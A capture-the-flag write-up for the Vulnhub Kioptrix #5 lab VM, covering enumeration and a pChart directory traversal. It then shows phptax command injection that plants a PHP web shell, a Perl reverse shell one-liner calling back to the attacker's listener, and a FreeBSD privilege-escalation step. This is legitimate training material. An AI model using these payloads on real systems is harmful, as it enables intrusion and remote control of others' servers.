Vulnhub - Kioptrix #5 Writeup
Description
Vulnhub - Kioptrix #5
As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.
Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.
This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.
Enumeration
Add kioptrix5.com
to hosts
file and start with Nmap
Nmap
Nmap scan report for kioptrix5.com (192.168.174.7)
Host is up, received arp-response (0.00078s latency).
rDNS record for 192.168.174.7: www.kioptrix5.com
Scanned at 2020-02-12 03:35:49 EST for 35s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp closed ssh reset ttl 64
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http syn-ack ttl 64 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
| http-methods:
|_ Supported Methods: HEAD
MAC Address: 08:00:27:5E:CC:7D (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 12 03:36:24 2020 -- 1 IP address (1 host up) scanned in 36.11 seconds
Hmm no ssh?
We have a web server on port 80 and a web server at port 8080. The index file served on port 80, contains the following.
<html>
<head>
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
Webport on 8080 returns a forbidden error. We will look into that later.
Look like its using a php
application named pchart
Searchsploit
A quick search using searchsploit
showed a directory traversal vulnerability.
searchsploit pchart
--------------------------------------------------------------------------------------------------------------
Exploit Title
---------------------------------------------------------------------------------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | exploits/php/webapps/31173.txt
---------------------------------------------------------------------------------------------------------------
Shellcodes: No Result
Essentially we can access any file that the web server has access to, using the following url
http://kioptrix5.com/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
We have access to so many important linux files. But which file can give us information to pop a shell?. After poking around for a long time I couldn’t find anything good enough and I had to look online for some hints.
Lets check why we can’t access port 8080
by looking at the httpd.conf
http://kioptrix5.com/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
Contents of httpd.conf
---output snipped---
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
We can see that the web server is only allowing requests when the user agent is Mozilla4_browser
.
Firefox Extension User-Agent Switcher and Manager
We can set custom user agent using a firefox
extension. After setting it to Mozilla4_browser
we can see a link to a php
application named phptax
.
Searchsploit
kali@kali:~/Desktop/vulnhub/kioptrix5$ searchsploit phptax
-----------------------------------------------------------------------
Exploit Title
-----------------------------------------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit) | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution | exploits/php/webapps/21665.txt
------------------------------------------------------------------------
Shellcodes: No Result
And we have some RCE
for this application. Lets try using it without metasploit
Low Shell
Understanding phptax
RCE
From exploit-db phptax RCE
include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
There is no input validation. If we set the value of pdf
keyword as make
we can execute any arbitrary command by appending a ;
before the command.
The first thing I did was to create a simple php web shell using the following.
kioptrix5.com:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php passthru($_GET[cmd]);?>' > testshell.php&pdf=make
URL Encoded
kioptrix5.com:8080/phptax/drawimage.php?pfilez=xxx;echo%20%27%3C%3Fphp%20passthru(%24_GET[cmd])%3B%3F%3E%27%20%3E%20testshell.php&pdf=make
Now we have a web shell that can execute commands using the cmd
parameter.
After running some commands I found that the system has nc
and perl
. But for some reason the nc
cannot use the -e
flag that can give us a reverse shell. So lets get a reverse shell using perl
A Shell Drop Issue
I was facing an issue while I was using perl
or telnet
commands to execute a reverse shell. The system establishes a connection and immediately drops it. It was driving me crazy. Then I remembered a technique that was used when executing shell code to prevent the shell from dropping. It was done by appending a cat -
at the end of the shellcode. When I tried the same thing here it worked. I don’t remember why it worked that way. But we have to append cat -
at the end of the reverse shell code or the system immediately drops the connection.
Perl Reverse Shell
kioptrix5.com:8080/phptax/drawimage.php?pfilez=xxx;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.63.3:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' | cat -&pdf=make
You might have to url encode it.
kali@kali:~/Desktop/tools$ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.63.3] from www.kioptrix5.com [192.168.63.4] 26454
id
uid=80(www) gid=80(www) groups=80(www)
Root Shell
Root is straight forward. There is a FreeBSD 9.0 < 9.1 - ‘mmap/ptrace’ Local Privilege Escalation available. I copied it to the system using ftp
. Compile it with gcc
and run to become root
Start a ftp server using python
. You might have to run sudo pip3 install pyftpdlib
kali@kali:~/Desktop/vulnhub/kioptrix5$ sudo python3 -m pyftpdlib -p 21
[I 2020-02-14 04:51:53] >>> starting FTP server on 0.0.0.0:21, pid=6268 <<<
[I 2020-02-14 04:51:53] concurrency model: async
[I 2020-02-14 04:51:53] masquerade (NAT) address: None
[I 2020-02-14 04:51:53] passive ports: None
[I 2020-02-14 04:52:03] 192.168.63.4:32644-[] FTP session opened (connect)
[I 2020-02-14 04:52:12] 192.168.63.4:32644-[anonymous] USER 'anonymous' logged in.
[I 2020-02-14 04:52:16] 192.168.63.4:32644-[anonymous] RETR /home/kali/Desktop/vulnhub/kioptrix5/exploit.c completed=1
[I 2020-02-14 04:52:18] 192.168.63.4:32644-[anonymous] FTP session closed (disconnect).
Login as anonymous
with any password and copy the exploit.
$ ftp 192.168.63.3
anonymous
Password: aa
Name (192.168.63.3:root): get exploit.c
exit
$ gcc exploit.c
$ ./a.out
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
cd /root
cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...
Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.
As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.
For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.
As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)
The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.
Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.
Be good...
loneferret
http://www.kioptrix.com
p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)
And we are root!..